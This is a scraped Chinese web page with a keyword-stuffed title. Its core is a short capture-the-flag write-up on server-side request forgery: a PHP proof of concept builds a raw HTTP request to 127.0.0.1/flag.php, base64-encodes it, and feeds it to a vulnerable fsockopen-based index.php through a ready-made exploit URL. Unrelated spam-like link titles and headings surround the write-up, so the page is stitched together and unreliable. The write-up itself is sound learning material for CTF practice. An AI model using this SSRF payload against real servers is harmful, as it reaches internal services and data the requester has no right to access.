当前位置: 首页 > news >正文

用表格做网站教程大连市房屋管理局官网

用表格做网站教程,大连市房屋管理局官网,前后端分离实现网站开发,北京房地产信息网这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察 本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 bas…

这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

http://www.yayakq.cn/news/319347/

相关文章:

  • 网站做兼容处理怎么门户网站类型有哪些
  • jsp网站开发面试题网站建设与管理规划书
  • 封面型网站怎么做的公司做网站做什么类型的网站好
  • 企业网站建设中企动力front-page wordpress
  • WordPress建站教程 网盘如何创建一个
  • 都匀市城乡建设局网站建筑人才网官网挂证
  • 集约化网站建设的函哈尔滨网站制作软件
  • 河北省建设厅网站登陆设置微信手机官方网站首页
  • 房地产开发公司网站网站点击量在哪里看
  • 一个网站的首页包括什么wordpress发消息
  • 厦门旅游网站设计用html制作个人简历
  • 厦门营销型网站建设做网站 哪里发布
  • 哪家网站建设公司好wordpress 多个注册表单
  • 徐州建设工程材料检测预约网站咨询公司企业文化
  • 主流数据网站网站制作费用低
  • seo网站排名优化公司哪家郑州餐饮 网站建设
  • 杭州市公共资源交易中心湘潭网站建设优化技术
  • 阿里巴巴怎么做企业网站宣传建设大马路小学网站
  • 网站定制公司报价网站和数据库
  • 摄影师网站html5建筑室内设计软件
  • 网站信息化建设存在的困难建筑公司网站起名
  • 做情诗网站鸽WordPress主题
  • 做特卖网站手机版Wordpress现有数据库表
  • 制作网站哪家好嘉兴网站建设方案
  • 影视网站模板怎么做广州番禺电缆集团有限公司
  • 跟业务合作做网站给多少提成聊城做网站做的不错的网络公司
  • 模板网站建设 百度在线平台
  • 培训如何优化网站免费精品网站模板
  • 智能网站建设找三好科技个人怎么找猎头公司推荐自己
  • 西安网站建设 乐云seo武夷山网站设计